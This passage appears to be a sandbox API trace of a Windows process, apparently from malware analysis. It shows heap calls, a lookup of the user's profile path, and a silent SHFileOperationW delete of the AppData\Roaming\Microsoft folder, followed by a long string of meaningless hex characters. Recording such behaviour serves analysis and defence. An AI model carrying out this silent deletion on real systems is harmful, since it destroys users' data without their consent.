out: hHeap=0x25c0000) returned 1 [0201.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0201.221] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0201.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0201.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0201.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0201.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0201.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0201.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0201.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0201.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0201.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0201.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0201.222] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0201.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0201.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0201.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0201.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0201.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0201.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0201.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0201.222] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0201.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0201.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0201.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0201.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0201.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0201.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0201.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0201.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0201.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0201.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0201.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0201.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0201.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0201.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0201.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0201.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0201.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0201.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0201.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0201.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0201.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0201.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0201.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0201.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0201.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0201.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0201.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0201.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0201.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0201.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0201.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0201.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0201.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0201.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0201.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0201.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0201.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0201.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240c8d0 [0201.224] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Microsoft", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft", lpFilePart=0x8bf658*="Microsoft") returned 0x37 [0201.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0201.225] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft")) returned 0x2014 [0201.225] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\x